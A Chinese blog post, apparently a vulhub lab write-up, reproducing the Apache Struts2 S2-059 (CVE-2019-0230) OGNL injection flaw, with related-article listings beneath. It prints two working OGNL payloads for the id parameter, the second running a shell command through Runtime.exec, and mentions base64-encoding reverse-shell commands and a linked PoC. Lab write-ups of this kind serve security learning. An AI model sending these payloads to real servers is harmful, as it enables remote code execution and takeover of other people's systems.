Struts2_059_RCE CVE-2019-0230 漏洞复现

最新推荐文章于 2024-07-19 23:37:26 发布
最新推荐文章于 2024-07-19 23:37:26 发布
阅读量562 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全 网络安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/113657918
版权
本文介绍了Apache Struts2的059漏洞,详细阐述了漏洞利用过程,包括burpuite抓包、修改payload和重放包以实现代码执行。漏洞涉及特定标签属性的二次解析,允许攻击者通过OGNL表达式注入执行任意代码。文中提供了两种payload的示例,并展示了如何在docker环境下验证漏洞。作者分享了复现漏洞的难点和学习经验,同时给出了参考资料链接。
摘要由CSDN通过智能技术生成

Struts2_059_远程代码执行

by ADummy

0x00利用路线

​ burpuite抓包—>修改payload—>重放包—>代码执行

0x01漏洞介绍

​ Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。

​ 影响版本

	2.0.0 - 2.5.20

0x02漏洞复现

payload1:

?id=%{(#context=#attr[‘struts.valueStack’].context).(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses(’’)).(#ognlUtil.setExcludedPackageNames(’’))}

payload2:

?id=%{(#context=#attr[‘struts.valueStack’].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec(‘touch /test’))}

​ 登录界面

在这里插入图片描述

​ Burpsuite抓包,发送第一个payload

在这里插入图片描述

​ Burpsuite抓包,发送第二个payload

在这里插入图片描述

​ docker进入容器,查看tmp目录,生成test文件,命令成功执行。
在这里插入图片描述

(PS:代码执行后无回显,利用bash反弹shell需要base64编码,,参考了 hatjwe师傅的文章)

base64在线编码: http://www.jackson-t.ca/runtime-exec-payloads.html

poc:https://github.com/ADummmy/vulhub_Writeup/tree/main/code/struts2_059_poc.py

0x03总结

​ 这是笔者的第三篇文章,复现了大概一天左右,网络上文章质量参差不齐,刚入门导致代码审计看不懂,对新手友好度太差,要么就是上来一段payload和poc,都不告诉你,具体流程是什么,踩了很多坑。不过在此过程中,本人也学到了很多。

0x04参考资料

https://my.oschina.net/u/4593034/blog/4693589

所有的writeup,方便下载,留存。
https://github.com/ADummmy/vulhub_Writeup

ADummy_
关注
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059CVE-2019-0230
qq_51577576的博客
12-14 641
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059CVE-2019-0230漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
漏洞复现Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
04-15 3403
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响与本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
Struts2 S2-059 远程代码执行漏洞CVE-2019-0230复现
玄道的网安博客
10-28 1949
简介 Struts2是一个基于MVC设计模式的Web应用框架 影响版本 Struts 2.0.0 – Struts 2.5.20 环境搭建 使用vulhub快速搭建 https://github.com/vulhub/vulhub 进入目录 cd vulhub-master/struts2/s2-059 docker安装 docker-compose up -d 启动环境之后访问http://your-ip:8080/?id=1就可以看到测试界面 漏洞...
(RCE)(Struts2)s2-008漏洞学习笔记
最新发布
aaaadoga的博客
07-19 220
这篇文章是关于作者学习s2-008漏洞的笔记关于这篇文章,如果有建议或问题请留言或联系。
struts059-cve_2019_0230漏洞复现
0day
01-27 1700
struts059-cve_2019_0230漏洞复现 漏洞概述: 该漏洞编号为CVE-2019-0230漏洞等级:高危。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。 复现漏洞: 启动虚拟机,在docker中运行vulfocus镜像,通过浏览器访问,并下载struts059-cve_2019_0230镜像 启动漏洞环境,开始漏洞复现 打开漏洞..
S2-059 远程代码执行漏洞(CVE-2019-0230)
EC_Carrot的博客
08-15 436
漏洞简介 影响版本: Struts 2.0.0 - Struts 2.5.20 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-059/README.zh-cn.md 漏洞复现 我们用python来运行以下Poc,即可利用漏洞: import requests url = "http://127.0.0.1:8080" data1 = { "id": "%{(#context=#attr['struts.valueStack
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方...
Struts2 S2-046漏洞复现CVE-2017-5638)
1
05-27 3783
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638)
qq_51577576的博客
11-20 830
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638) Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053(CVE-2017-12611)
qq_51577576的博客
12-12 645
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053(CVE-2017-12611) Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞
Struts2漏洞检查工具2019版 V2.3.exe
01-16
Struts2漏洞检查工具2019版 警告: 本工具为漏洞自查工具,请勿非法攻击他人网站! ==漏洞编号==============影响版本=========================官方公告==========================================影响范围===== S2-057 CVE-2018-11776 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 https://cwiki.apache.org/confluence/display/WW/S2-057 影响范围非常小 S2-048 CVE-2017-9791 Struts 2.3.X http://127.0.0.1:8090/struts2-showcase/integration/saveGangster.action 影响范围非常小 S2-046 CVE-2017-5638 Struts 2.3.5-2.3.31,Struts 2.5-2.5.10 http://struts.apache.org/docs/s2-046.html 和S2-045一样 S2-045 CVE-2017-5638 Struts 2.3.5-2.3.31,Struts 2.5-2.5.10 http://struts.apache.org/docs/s2-045.html 影响范围较大 S2-037 CVE-2016-4438 Struts 2.3.20-2.3.28.1 http://struts.apache.org/docs/s2-037.html 影响范围小 S2-032 CVE-2016-3081 Struts 2.3.18-2.3.28 http://struts.apache.org/release/2.3.x/docs/s2-032.html 影响范围小 S2-020 CVE-2014-0094 Struts 2.0.0-2.3.16 http://struts.apache.org/release/2.3.x/docs/s2-020.html 影响范围小 S2-019 CVE-2013-4316 Struts 2.0.0-2.3.15.1 http://struts.apache.org/release/2.3.x/docs/s2-019.html 影响范围一般 S2-016 CVE-2013-2251 Struts 2.0.0-2.3.15 http://struts.apache.org/release/2.3.x/docs/s2-016.html 影响范围非常大 S2-013 CVE-2013-1966 Struts 2.0.0-2.3.14 http://struts.apache.org/release/2.3.x/docs/s2-013.html 未添加,S2-016范围内 S2-009 CVE-2011-3923 Struts 2.0.0-2.3.1.1 http://struts.apache.org/release/2.3.x/docs/s2-009.html 未添加,S2-016范围内 S2-005 CVE-2010-1870 Struts 2.0.0-2.1.8.1 http://struts.apache.org/release/2.2.x/docs/s2-005.html 未添加,S2-016范围内
Struts2漏洞利用工具2019版 V2.3.zip
02-24
Struts2漏洞利用工具2019版 V2.3. Struts2漏洞检测工具,请勿非法攻击他人网站,安恒大佬的作品
CVE-2019-0230:CVE-2019-0230S2-059 POC
03-10
CVE-2019-0230 CVE-2019-0230s2-059 poc。
Struts2-059 远程代码执行漏洞CVE-2019-0230)分析
weixin_46236101的博客
10-14 3192
前言 2020年8月13日虽然近几年来关于ONGL方面的漏洞已经不多了,但是毕竟是经典系列的RCE漏洞,还是有必要分析的。而且对于Struts2和OGNL了解也有助于代码审计和漏洞挖掘。 首先了解一下什么是OGNL,Object Graphic Navigation Language(对象图导航语言)的缩写,Struts框架使用OGNL作为默认的表达式语言。 struts2_S2_059S2_029漏洞产生的原理类似,都是由于标签属性值进行二次表达式解析产生的,细微差别会在分析中提到。 漏洞利用前置条件是
CVE-2019-0230:Apache Struts2远程代码执行漏洞通告
爱国小白帽
08-14 3803
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-081302 报告来源:360CERT 报告作者:360CERT 更新日期:2020-08-13 0x01 漏洞简述 2020年08月13日, 360CERT监测发现Apache官方发布了Struts2远程代码执行漏洞的风险通告,该漏洞编号为CVE-2019-0230漏洞等级:高危,漏洞评分:8.5。 攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL
Struts2系列漏洞利用工具-Struts2全版本漏洞检测工具(三)
siu~
09-21 3393
Struts2系列漏洞利用工具
struts2 2.3 升级2.5.22配置(附带漏洞检测工具)
qq_40248086的博客
03-09 7021
1.首先更新jar包。从官网下载对应版本struts-2.5.22-lib。下面是我选择的替换需要用的包 2.一定要删除自己项目中的xwork-core-2.3.20.jar,因为这个类库在struts升级到2.5版本已经包含在了struts2-core中了,所以一定要删除。这时候我们自定义拦截器中可能需要修改了。 修改前: 修改后: 3.修改配置 1)修改web.xml ...
Struts2漏洞和Struts Scan工具实战
qq_50854662的博客
10-30 2617
一、Apache Struts 2漏洞背景 1.漏洞详情 2017年3月6日,Apache Struts 2被曝存在远程命令执行漏洞。在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值构造恶意代码,在服务器上执行系统命令,完全控制该服务器,最后达到挖矿、对外攻/击、数据窃取勒索、篡改为菠菜站等目的。漏洞利用所需组件默认启用,风险等级为高危。 2.漏洞编号 CVE-2017-5638 CNNVD-201703...
CVE-2019-19781 Citrix漏洞:远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值